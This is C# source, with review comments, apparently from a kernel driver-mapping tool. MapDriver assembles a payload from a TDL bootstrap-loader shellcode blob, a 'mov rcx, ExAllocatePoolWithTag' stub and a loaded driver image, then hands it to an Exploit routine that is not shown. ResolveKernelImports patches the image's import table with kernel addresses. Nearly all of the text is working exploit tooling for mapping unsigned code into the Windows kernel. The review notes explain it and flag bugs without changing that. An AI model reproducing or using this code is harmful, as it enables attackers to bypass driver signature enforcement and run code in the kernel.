 /// <summary>
 /// Builds the payload buffer for the mapper and hands it to <c>Exploit</c>.
 /// Sequence as written: <c>Unload()</c>, <c>Load()</c>, then inside the try:
 /// load the image at <paramref name="driverPath"/> into this process with
 /// <c>Natives.LoadLibrary</c>, prefix <c>Shellcode.TDLBootstrapLoader_code_w10rs2</c>
 /// with the two-byte <c>mov rcx, imm64</c> stub carrying the value returned by
 /// <c>Natives.FindKernelProcedure("ExAllocatePoolWithTag")</c>, zero-pad the buffer
 /// to 0x30a bytes, append 0x7000 bytes copied from the loaded image (after
 /// <c>ImportResolver.ResolveKernelImports</c>) and call
 /// <c>Exploit(buffer, 0x8000, 0x30a)</c>. <c>Unload()</c> runs again in
 /// <c>finally</c>, on both the success and the failure path.
 /// </summary>
 /// <param name="driverPath">Path handed unchanged to <c>Natives.LoadLibrary</c>;
 /// it is not validated here (no null/empty check).</param>
 /// <remarks>
 /// Every exception is caught and only <c>e.Message</c> is written to the console, so
 /// the exception type and stack trace are lost and nothing is reported to the caller.
 /// The meaning of the 0x8000 and 0x30a arguments to <c>Exploit</c> is not visible on
 /// this page; 0x30a is also the padded offset at which the image bytes start.
 /// </remarks>
 public static void MapDriver(String driverPath)
 {
     Unload();
     Load();
     try
     {
         // NOTE(review): the returned handle is not checked for a failed (zero) load
         // before it is dereferenced by Marshal.Copy below.
         var imageBase             = Natives.LoadLibrary(driverPath);
         var ExAllocatePoolWithTag = Natives.FindKernelProcedure("ExAllocatePoolWithTag");
         var shellcode             = new List <Byte>();
         shellcode.Add(0x48); // mov rcx, ExAllocatePoolWithTag
         shellcode.Add(0xb9);
         // Immediate operand of the mov above; 8 bytes assuming FindKernelProcedure
         // returns a 64-bit value (the other example on this page casts it to UInt64).
         shellcode.AddRange(BitConverter.GetBytes(ExAllocatePoolWithTag));
         shellcode.AddRange(Shellcode.TDLBootstrapLoader_code_w10rs2);
         // Fixed copy size, not derived from the image's SizeOfImage: presumably a
         // smaller module is over-read and a larger one truncated — the todo below
         // is the author's own marker for this.
         var image = new Byte[0x7000]; // todo, pull from memory
         Marshal.Copy(imageBase, image, 0, image.Length);
         image = ImportResolver.ResolveKernelImports(image);
         // Zero-pads up to 0x30a bytes. NOTE(review): the condition is "!=", so if
         // the buffer is already longer than 0x30a this loop never terminates;
         // also Count() here is the LINQ extension, the List Count property suffices.
         while (shellcode.Count() != 0x30a)
         {
             shellcode.Add(0);
         }
         shellcode.AddRange(image);
         Exploit(shellcode.ToArray(), 0x8000, 0x30a);
     }
     catch (Exception e)
     {
         // Swallows every exception type; only the message survives.
         Console.WriteLine(e.Message);
     }
     finally
     {
         Unload();
     }
 }
        /// <summary>
        /// Resolves the import-address table of a PE32+ image held in <paramref name="Image"/>:
        /// for each import-by-name entry of the first import descriptor, the value returned by
        /// <c>Natives.FindKernelProcedure(name)</c> is written over the 8-byte thunk slot.
        /// The array is modified in place and the same reference is returned.
        /// </summary>
        /// <param name="Image">Image bytes laid out as in memory (section-aligned): every RVA
        /// read from the headers is used directly as an index into this array, so a raw
        /// on-disk file would be misparsed. Nothing about the buffer is validated; see remarks.</param>
        /// <returns>The same <paramref name="Image"/> array, patched; returned untouched when the
        /// optional header reports at most one data directory or the import directory RVA is 0.</returns>
        /// <exception cref="Exception">Thrown with the message "Fix this" when an import-by-ordinal
        /// entry (ordinal flag set, so the 64-bit thunk reads negative) is encountered.</exception>
        /// <remarks>
        /// No bounds checking is done on any header value; a truncated or malformed image makes
        /// <see cref="BitConverter"/> throw <see cref="ArgumentOutOfRangeException"/> or
        /// <see cref="ArgumentException"/> rather than a descriptive error. Only the first
        /// <c>IMAGE_IMPORT_DESCRIPTOR</c> is walked, so later descriptors (imports from a second
        /// module) are silently ignored. The 0x6c/0x78 optional-header offsets and the 8-byte
        /// thunks are the 64-bit (PE32+) layout; a PE32 image would not be parsed correctly.
        /// </remarks>
        public static Byte[] ResolveKernelImports(Byte[] Image)
        {
            // e_lfanew at 0x3c gives the PE signature offset; +0x18 skips the 4-byte
            // signature and the 20-byte file header to reach the optional header.
            var headerOffset         = BitConverter.ToInt32(Image, 0x3c);
            var optionalHeaderOffset = headerOffset + 0x18;
            // NumberOfRvaAndSizes (PE32+ optional header + 0x6c).
            var numberOfRva          = BitConverter.ToInt32(Image, optionalHeaderOffset + 0x6c);

            if (numberOfRva <= 1)
            {
                return(Image);
            }
            // Import directory RVA (data directory index 1, PE32+ optional header + 0x78);
            // used as an offset into Image directly.
            var importTableVa = BitConverter.ToInt32(Image, optionalHeaderOffset + 0x78);

            if (importTableVa == 0)
            {
                return(Image);
            }
            // IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk at +0, FirstThunk at +16.
            // Only this first descriptor is processed.
            var originalThunkPtr = BitConverter.ToInt32(Image, importTableVa + 0);
            var baseThunkPtr     = BitConverter.ToInt32(Image, importTableVa + 16);

            // 8-byte thunk entries, terminated by a zero entry.
            for (int i = 0; ; i++)
            {
                var originalThunk2 = BitConverter.ToInt64(Image, originalThunkPtr + i * 8);
                if (originalThunk2 == 0)
                {
                    break;
                }
                // NOTE(review): assigned but never read.
                var thunk = BitConverter.ToInt64(Image, baseThunkPtr + i * 8);
                // Sign bit clear means the ordinal flag is not set: import by name.
                if (originalThunk2 > 0)
                {
                    // Hint/name entry: skip the 2-byte hint and read the NUL-terminated name.
                    // Encoding.Default is platform dependent (ANSI on .NET Framework, UTF-8 on
                    // .NET Core); import names are presumably ASCII. Skip() walks the array
                    // from the start on every entry.
                    var name = Encoding.Default.GetString(Image.Skip((int)originalThunk2 + 2).TakeWhile(b => b != 0).ToArray());
                    // Overwrite the IAT slot with the resolved 8-byte address.
                    Array.Copy(BitConverter.GetBytes((UInt64)Natives.FindKernelProcedure(name)), 0, Image, baseThunkPtr + i * 8, 8);
                }
                else
                {
                    // Import by ordinal is not supported. NOTE(review): a specific type such as
                    // NotSupportedException with a descriptive message would be clearer than
                    // a bare Exception.
                    throw new Exception("Fix this");
                }
            }
            return(Image);
        }